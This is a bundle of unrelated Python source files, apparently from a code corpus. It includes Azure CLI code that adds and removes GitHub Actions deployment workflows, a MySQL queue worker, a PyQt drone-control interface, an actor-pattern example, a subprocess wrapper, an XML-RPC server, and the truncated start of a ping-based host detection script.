github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
client.py
|
#coding=utf8
import time, sys, Queue
import MySQLdb
from MySQLdb import cursors
from multiprocessing.managers import BaseManager
from multiprocessing.sharedctypes import RawArray
from multiprocessing import Process, freeze_support, Array
reload(sys)
sys.setdefaultencoding('utf8')
def work(server_addr):
# 数据库连接
from database.db import baidu_db
# 网络连接
class QueueManager(BaseManager):
pass
QueueManager.register('get_task_queue')
QueueManager.register('get_result_queue')
print('Connect to server %s...' % server_addr)
m = QueueManager(address=(server_addr, 5000), authkey='abc')
m.connect()
task = m.get_task_queue()
result = m.get_result_queue()
while True:
try:
(nn, ii, jj, name) = task.get(timeout=100)
candidates = baidu_db.getCandidates(name)
result.put((nn, ii, jj, candidates))
except Queue.Empty:
print 'queue is empty'
continue
print 'worker exit.'
if __name__ == '__main__':
freeze_support()
if len(sys.argv) > 1:
num = int(sys.argv[1])
else:
num = 3
print 'total process number is %d'%num
processes = []
for i in xrange(num):
processes.append(Process(target=work, args = ('192.168.1.104',)))
for p in processes:
p.start()
for p in processes:
p.join()
|
UserInterface.py
|
import os
import math
import time
from threading import Thread, Timer
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
# Main widget
from widgets.ControlPanel import ControlPanel
# Dialog with combo
from dialogs.ComboDialog import ComboDialog
# Replay
from ..log.Replay import Replay
# Drone and fans array control
from ..Commander import Commander
class UserInterface(QMainWindow):
"""Main window of the interface
Provides GUI for windshape drone control.
Inherits from: QMainWindow.
Overrides: __init__, KeyPressEvent
"""
## Refreshing rate
FRAMERATE = 30
def __init__(self):
"""Initializes parent and starts update."""
super(UserInterface, self).__init__()
# Main class
self.commander = Commander()
# Drone control
self.drone = self.commander.getDrone()
self.control = self.drone.getControlParameters()
# Fans array control
self.fansArray = self.commander.getFansArray()
# Check drone state
self.connected = False
self.armed = False
self.tracked = False
self.powered = False
self.faconnected = False
# Setup UI
self.setupUI()
# Timer updating window
self.initTimer()
# Shows window
self.show()
def setupUI(self):
"""Creates Graphical User Interface."""
# Window title and dimensions
self.setWindowTitle('Drone control')
self.setGeometry(0, 0, 1000, 800)
# Main widget (TabWidget)
self.controlPanel = ControlPanel(self)
self.setCentralWidget(self.controlPanel)
# Generates QIcons
self.createIcons()
self.setWindowIcon(self.icon_ws)
# Tool bar (top)
self.toolbar = self.addToolBar('Commands')
self.initToolBar()
self.updateToolbar = True # Updates toolbar actions if True
# Status bar (bottom)
self.statusbar = self.statusBar()
self.statusbar.showMessage('Initialization')
self.updateStatus = True # Locks status bar if set to False
def createIcons(self):
"""Loads QIcons from images in ./icons."""
path = os.path.dirname(os.path.abspath(__file__))+'/icons'
# WindShape icon (window icon)
self.icon_ws = QIcon(path + '/windshape.png')
# Drone icons
self.icon_drone_green = QIcon(path + '/drone_green.png')
self.icon_drone_red = QIcon(path + '/drone_red.png')
# A, D, M icons (for Arming, Disarming, flight Modes)
self.icon_A = QIcon(path + '/A.png')
self.icon_D = QIcon(path + '/D.png')
self.icon_M = QIcon(path + '/M.png')
# Eyes icons (for tracking state)
self.icon_opened_eye = QIcon(path + '/opened_eye.png')
self.icon_closed_eye = QIcon(path + '/closed_eye.png')
# Connection icons (fans array connection)
self.icon_red = QIcon(path + '/red.png')
self.icon_green = QIcon(path + '/green.png')
# Start icon (for replay)
self.icon_start = QIcon(path + '/start.png')
# Top and bottom arrows (for takeoff and land)
self.icon_top_arrow = QIcon(path + '/top_arrow.png')
self.icon_bottom_arrow = QIcon(path + '/bottom_arrow.png')
def initToolBar(self):
"""Loads toolbar actions."""
# Connection
self.connectAction = QAction(self.icon_drone_red, 'Drone diconnected', self)
self.connectAction.triggered.connect(self.onConnect)
self.toolbar.addAction(self.connectAction)
# Fans array PSU
self.toggleAction = QAction(self.icon_red, 'PSU off', self)
self.toggleAction.triggered.connect(self.onTogglePSU)
self.toolbar.addAction(self.toggleAction)
# Tracking
self.trackAction = QAction(self.icon_closed_eye, 'Drone not tracked', self)
self.trackAction.triggered.connect(self.onTrack)
self.toolbar.addAction(self.trackAction)
# Arming
self.armingAction = QAction(self.icon_D, 'Arm', self)
self.armingAction.triggered.connect(self.onArm)
self.toolbar.addAction(self.armingAction)
# Takeoff
self.takeoffAction = QAction(self.icon_top_arrow, 'Takeoff', self)
self.takeoffAction.triggered.connect(self.onTakeoff)
self.toolbar.addAction(self.takeoffAction)
# Land
self.landAction = QAction(self.icon_bottom_arrow, 'Land', self)
self.landAction.triggered.connect(self.onLand)
self.toolbar.addAction(self.landAction)
# Flight mode
self.modeAction = QAction(self.icon_M, 'Flight mode', self)
self.modeAction.triggered.connect(self.onMode)
self.toolbar.addAction(self.modeAction)
# Replay
self.replayAction = QAction(self.icon_start, 'Replay', self)
self.replayAction.triggered.connect(self.onReplay)
self.toolbar.addAction(self.replayAction)
def disableToolBar(self):
"""Disables all toolbar actions."""
self.connectAction.setEnabled(False)
self.trackAction.setEnabled(False)
self.armingAction.setEnabled(False)
self.takeoffAction.setEnabled(False)
self.landAction.setEnabled(False)
def refreshToolBar(self):
"""Asks for toolbar update."""
self.updateToolbar = True
def showMessage(self, message, duration=3):
"""Displays a message for duration beofre overwrite."""
# Locks status bar to block updates and prevents overwriting
self.updateStatus = False
# Display message
self.statusbar.showMessage(str(message))
# If duration is None, wait infinite time before unlocking
if duration is not None:
Timer(duration, self.unlockStatus).start()
def unlockStatus(self):
"""Enable overwriting messages in statusbar."""
self.updateStatus = True
def onConnect(self):
"""Displays drone status."""
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText(str(self.drone))
msg.setWindowTitle('Drone information')
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
def onTrack(self):
"""Displays tracking status."""
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText(str(self.control.getTarget()))
msg.setWindowTitle('Target information')
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
def onArm(self):
"""Arms or disarm the drone."""
self.disableToolBar()
cmd = not self.drone.isArmed()
# Show message
if cmd:
self.showMessage('Arming')
else:
self.showMessage('Disarming')
# Arm and refresh toolbar
def arm():
self.drone.arm(cmd)
self.updateToolbar = True
Thread(target=arm).start()
Timer(3, self.updateToolBar).start()
def onTakeoff(self):
"""Auto-takeoff the drone."""
self.disableToolBar()
# Takeoff and refresh toolbar
def takeoff():
self.drone.takeoff()
self.updateToolbar = True
# Takeoff in a separate thread
Thread(target=takeoff).start()
Timer(3, self.updateToolBar).start()
def onLand(self):
"""Auto-land the drone."""
self.disableToolBar()
# Land and refresh toolbar
def land():
self.drone.land()
self.updateToolbar = True
# Land in a separate thread
Thread(target=land).start()
Timer(3, self.updateToolBar).start()
def onMode(self):
"""Changes flight mode with dialog choice."""
mode = self.drone.getFlightMode()
modes = self.drone.FLIGHT_MODES
# Flight mode choice
dialog = ComboDialog(self, 'Flight mode', modes, mode)
# Set new mode in a separate thread if OK pressed
if dialog.exec_():
mode = dialog.getResult()
def set_mode():
self.drone.setFlightMode(mode)
self.updateToolbar = True
Thread(target=set_mode).start()
def onReplay(self):
"""Fetches available record files and plot the chosen one."""
Replay(self)
def onTogglePSU(self):
"""Turns on or off fans array power supply."""
self.fansArray.turnOnPSU(not self.fansArray.isPowered())
def initTimer(self):
"""Starts calling update at FRAMERATE."""
self.timer = QTimer(self)
self.timer.setInterval(1000.0/UserInterface.FRAMERATE)
self.timer.timeout.connect(self.update)
self.timer.start()
def update(self):
"""Updates toolbar, statusbar and control panel."""
self.checkStatus()
# Toolbar update if new state or request from a timer
if self.updateToolbar:
self.updateToolBar()
self.updateStatusBar()
self.updateToolbar = False
# Show drone status if no message to display
if self.updateStatus:
self.updateStatusBar()
# Update tabs
self.updateWind()
self.updateInfo()
self.updatePlot()
self.updateSettings()
def checkStatus(self):
"""Asks for refresh if something needs display."""
if self.connected != self.drone.isConnected():
self.connected = self.drone.isConnected()
self.updateToolbar = True
if self.armed != self.drone.isArmed():
self.armed = self.drone.isArmed()
self.updateToolbar = True
if self.tracked != self.drone.isTracked():
self.tracked = self.drone.isTracked()
self.updateToolbar = True
if self.powered != self.fansArray.isPowered():
self.powered = self.fansArray.isPowered()
self.updateToolbar = True
if self.faconnected != self.fansArray.isConnected():
self.faconnected = self.fansArray.isConnected()
self.updateToolbar = True
def updateStatusBar(self):
"""Updates the status bar message."""
if self.drone.isConnected():
message = 'Connected'
else:
message = 'Disconnected'
if self.drone.isArmed():
message += ', Armed'
self.statusbar.showMessage(message)
self.updateStatus = True
def updateToolBar(self):
"""Updates the tool bar icons and activation."""
self.disableToolBar()
# Checks which actions are permitted and updates icons
self.updateConnectAction()
self.updateTrackAction()
self.updateArmingAction()
self.updateTLAction()
self.updateToggleAction()
def updateConnectAction(self):
"""Updates connection icon."""
# Icon and tool tip
if self.drone.isConnected():
self.connectAction.setIcon(self.icon_drone_green)
self.connectAction.setToolTip('Drone connected')
else:
self.connectAction.setIcon(self.icon_drone_red)
self.connectAction.setToolTip('Drone disconnected')
# Always enabled
self.connectAction.setEnabled(True)
def updateToggleAction(self):
"""Change fans array power supply icon."""
if self.fansArray.isConnected():
self.toggleAction.setIcon(self.icon_green)
else:
self.toggleAction.setIcon(self.icon_red)
if self.fansArray.isPowered():
self.toggleAction.setToolTip('PSU on')
else:
self.toggleAction.setToolTip('PSU off')
def updateTrackAction(self):
"""Updates tracking icon."""
# Icon and tool tip
if self.drone.isTracked():
self.trackAction.setIcon(self.icon_opened_eye)
self.trackAction.setToolTip('Drone tracked')
else:
self.trackAction.setIcon(self.icon_closed_eye)
self.trackAction.setToolTip('Drone not tracked')
# Always enabled
self.trackAction.setEnabled(True)
def updateArmingAction(self):
"""Enables/disables arming action and updates icon."""
# Arming icon = A if armed
if self.drone.isArmed():
self.armingAction.setIcon(self.icon_A)
self.armingAction.setToolTip('Disarm')
# Arming icon = D if disarmed
else:
self.armingAction.setIcon(self.icon_D)
self.armingAction.setToolTip('Arm')
# Can arm/disarm only if drone connected
if self.drone.isConnected():
self.armingAction.setEnabled(True)
def updateTLAction(self):
"""Enables/disables takeoff/land action."""
# Can takeoff/land only if armed
if self.drone.isArmed():
self.takeoffAction.setEnabled(True)
self.landAction.setEnabled(True)
def updateWind(self):
"""Updates wind tab (activation of auto wind)."""
activate = self.controlPanel.getAutoWind()
self.commander.setAutoWind(activate)
def updateInfo(self):
"""Updates info tab (get data from drone)."""
# Gets info source from CP
source = self.controlPanel.getSource()
if source == 'Info':
text = str(self.commander)
elif source == 'Pose':
text = self.drone.getMeasurements()
elif source == 'Command':
text = self.control.getMeasurements()
# Sends info to CP
self.controlPanel.displayInfo(text)
def updatePlot(self):
"""Plots drone pose (mocap, FCU, setpoint)."""
mocap = self.drone.getPose()
estimated = self.drone.getEstimate()
setpoint = self.drone.getControlParameters().getSetpoint()
# Send to control panel as list with source label
self.controlPanel.plotData('Mocap', list(mocap))
self.controlPanel.plotData('FCU', list(estimated))
self.controlPanel.plotData('Setpoint', list(setpoint))
def updateSettings(self):
"""Updates drone from settings tab."""
body, target = self.controlPanel.getMocapParameters()
if body != self.drone.getMocapLabel():
self.drone.setRigidBody(body)
self.showMessage('Drone tracker set to '+str(body))
if target != self.control.getTarget().getLabel():
self.control.setTarget(target)
self.showMessage('Drone target set to '+str(target))
offboard, follow, mimic, mask = self.controlPanel.getSettings()
if offboard != self.control.isUsingOffboardControl():
self.control.useOffboardControl(offboard)
self.showMessage('Offboard control set to '+str(offboard))
if follow != self.control.isFollowingTarget():
self.control.followTarget(follow)
self.showMessage('Target following set to '+str(follow))
if mimic != self.control.isMimingTarget():
self.control.mimicTarget(mimic)
self.showMessage('Target imitation set to '+str(mimic))
if mask != self.control.getMask():
self.control.setMask(*mask)
self.showMessage('Control mask set to '+str(mask))
# Update drone manual inputs
roll, pitch, yaw, thrust = self.controlPanel.getAttitude()
self.control.setManualAttitude(roll, pitch, yaw, thrust)
# Update rigid bodies list in CP
self.controlPanel.updateBodies(self.drone.getTrackersList())
def keyPressEvent(self, event):
"""Press Enter to send setpoint, PWM or validate settings."""
# Enter pressed
if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:
# Setpoint tab active
if self.controlPanel.currentIndex() == 0:
self.sendSetpoint()
# PWM tab active
elif self.controlPanel.currentIndex() == 2:
self.sendPWM()
def sendSetpoint(self):
"""Sends setpoint to the drone chosen in control panel."""
if self.controlPanel.setpointValid():
x, y, z, yaw = self.controlPanel.getSetpoint()
self.showMessage('Pose sent: '+str((x, y, z, yaw)))
self.control.setManualSetpoint(x, y, z, yaw)
else:
self.showMessage('Invalid setpoint')
def sendPWM(self):
"""Sends PWM value to fans array chosen in control panel."""
if self.controlPanel.pwmValid():
pwm = self.controlPanel.getPWM()
self.showMessage('PWM sent: '+str(pwm))
self.fansArray.setWindFunction(pwm)
else:
self.showMessage('Invalid PWM')
|
actor.py
|
# _*_ encoding:utf-8 _*_
"""
read package data test
"""
__author__ = "aaron.qiu"
from queue import Queue
from threading import Thread, Event
# Sentinel used for shutdown
class ActorExit(Exception):
pass
class Actor:
def __init__(self):
self._mailbox = Queue()
def send(self, msg):
'''
Send a message to the actor
'''
self._mailbox.put(msg)
def recv(self):
'''
Receive an incoming message
'''
msg = self._mailbox.get()
if msg is ActorExit:
raise ActorExit()
return msg
def close(self):
'''
Close the actor, thus shutting it down
'''
self.send(ActorExit)
def start(self):
'''
Start concurrent execution
'''
self._terminated = Event()
t = Thread(target=self._bootstrap)
t.daemon = True
t.start()
def _bootstrap(self):
try:
self.run()
except ActorExit:
pass
finally:
self._terminated.set()
def join(self):
self._terminated.wait()
def run(self):
'''
Run method to be implemented by the user
'''
while True:
msg = self.recv()
# Sample ActorTask
class PrintActor(Actor):
def run(self):
while True:
msg = self.recv()
print('Got:', msg)
# Sample use
p = PrintActor()
p.start()
p.send('Hello')
p.send('World')
p.close()
p.join()
|
ub_process.py
|
import subprocess
import traceback
from multiprocessing import Process
from uniback.tools.data_trackers import ProgressTracker, DataTracker
from time import sleep
from threading import Thread, Lock
import os
# process object with the ability to deal with subprocesses and parse
# their output as necessary
class UBProcess(Process):
def __init__(self):
super().__init__()
self.name = "Generic UB Process"
self.description = "Process without a set description."
self.category = "undefined"
self.can_update = True
self.data = {}
self.job_log = []
self.progress_tracker = ProgressTracker()
self.data_tracker = DataTracker()
self.logging = None
def testMethod(self):
# self.update_thread = Thread(target=self.data_update, daemon=True)
# self.update_thread_lock = Lock()
pass
def run(self):
self.update_thread = Thread(target=self.data_update, daemon=True)
self.update_thread_lock = Lock()
try:
self.update_thread.start()
except Exception as e:
self.log(f"update_thread exception: {e}")
pass
def start_subprocess(self, command):
try:
self.task = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# stdout, stderr = self.task.communicate()
except Exception as e:
self.log(f'Exception 1: {e}')
self.log(f'Traceback: {traceback.format_exc()}')
self.status('error')
return
try:
while self.task.poll() is None:
self.parse_input(self.task.stdout)
# self.log(self.progress_tracker.get_current_progress())
except Exception as e:
self.log(f'Exception 2: {e}')
self.log(f'Traceback: {traceback.format_exc()}')
self.status('error')
return
def parse_input(self, input):
temp = os.read(input.fileno(), 128).decode('utf-8')
# we want to only parse the multitude of regexes every once in a while
# in case they take up a lot of cpu time, hence we have a thread
# running in the background that lets the regex run every set amount of
# time at the moment, but can be changed as necessary. We still want to
# do the os.read so that the process does not halt execution
self.update_thread_lock.acquire()
if self.can_update:
self.data_tracker.update(temp)
self.progress_tracker.set_progress(temp)
self.send_data('progress', self.progress_tracker.get_current_progress())
temp_values = self.data_tracker.get_data_values()
if temp_values is not None:
for key, value in self.data_tracker.get_data_values().items:
self.send_data(key, value)
self.can_update = False
self.update_thread_lock.release()
def assign_progress_tracker(self, regex):
self.progress_tracker.reset_progress()
self.progress_tracker.set_regex(regex)
def assign_data_tracker(self, name, regex):
self.data_tracker.insert_tracker(name, regex)
def assign_queue(self, queue):
self.queue = queue
def assign_logger(self, logger):
self.logger = logger
def assign_data_manager(self, data_manager):
self.data_manager = data_manager
def send_data(self, data_name, data):
self.queue.put(
{'process_id': self.pid,
'data_name': data_name,
'data': data})
def log(self, data):
self.send_data('log', data)
def status(self, data):
self.send_data('status', data)
def data_update(self):
while True:
self.update_thread_lock.acquire()
self.can_update = True
self.update_thread_lock.release()
sleep(0.5)
|
server.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import threading
try:
from SimpleXMLRPCServer import SimpleXMLRPCServer
except ImportError:
from xmlrpc.server import SimpleXMLRPCServer
# socket.setdefaulttimeout(10)
__all__ = ['Server']
class Server(SimpleXMLRPCServer):
"""Version of a `SimpleXMLRPCServer` that can be ceanly terminated from the client side.
Examples
--------
.. code-block:: python
# service.py
from compas.rpc import Server
from compas.rpc import Service
from compas.rpc import kill
from compas.rpc import ping
class DefaultService(Service):
pass
if __name__ == '__main__':
server = Server(("localhost", 8888))
server.register_function(ping)
server.register_function(kill)
server.register_instance(DefaultService())
server.serve_forever()
"""
def ping(self):
"""Simple function used to check if a remote server can be reached.
Notes
-----
Should be used together with an instance of `compas.rpc.Server`.
"""
return 1
def remote_shutdown(self):
threading.Thread(target=self._shutdown_thread).start()
return 1
def _shutdown_thread(self):
self.shutdown()
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
detecta.py
|
from scapy.all import *
import platform
import subprocess
from threading import Thread
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
"""
@args:
<ip> Convierte una lista de enteros a un string para presentación
"""
def arr_to_ip(ip):
return f"{ip[0]}.{ip[1]}.{ip[2]}.{ip[3]}"
"""
@args:
<host> Es una dirección ip de tipo string
<result> Es una lista en la cual se almacenan los datos de la salida
"""
def ping(host,result):
param = '-n' if platform.system().lower()=='windows' else '-c'
command = ['ping', param, '1', host]
res=subprocess.Popen(command,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output=res.stdout.read().decode("utf-8")
r="100% packet loss" not in output
msg=""
res.terminate()
if r:
msg=f"{GREEN} with answer [✓]{END}"
else:
msg=f"{RED} without answer [x]{END}"
